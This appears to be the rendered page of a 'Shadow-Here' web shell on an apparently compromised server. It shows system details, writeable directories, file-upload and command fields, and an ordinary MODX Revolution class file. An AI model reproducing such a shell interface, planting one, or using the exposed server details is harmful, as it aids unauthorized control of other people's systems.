Shadow-Here


Server : Apache
System : Linux methusalix2 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
User : hios ( 1437)
PHP Version : 5.6.40-0+deb8u12
Disable Function : proc_close,proc_open,dl,shell_exec,passthru
Directory :  /home/dreiseitel/yin/core/model/modx/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :
Current File : /home/dreiseitel/yin/core/model/modx/modtemplatevarresourcegroup.class.php
<?php
/*
 * This file is part of MODX Revolution.
 *
 * Copyright (c) MODX, LLC. All Rights Reserved.
 *
 * For complete copyright and license information, see the COPYRIGHT and LICENSE
 * files found in the top-level directory of this distribution.
 */

/**
 * A relation between Template Variables and Resource Groups. Only user groups with the specified Resource Groups, if
 * any are set, will be able to edit the TV.
 *
 * @property int $tmplvarid The ID of the related TV
 * @property int $documentgroup The ID of the related Resource Group
 *
 * @see modResourceGroup
 * @see modTemplateVar
 * @package modx
 */
class modTemplateVarResourceGroup extends xPDOSimpleObject {}

Samx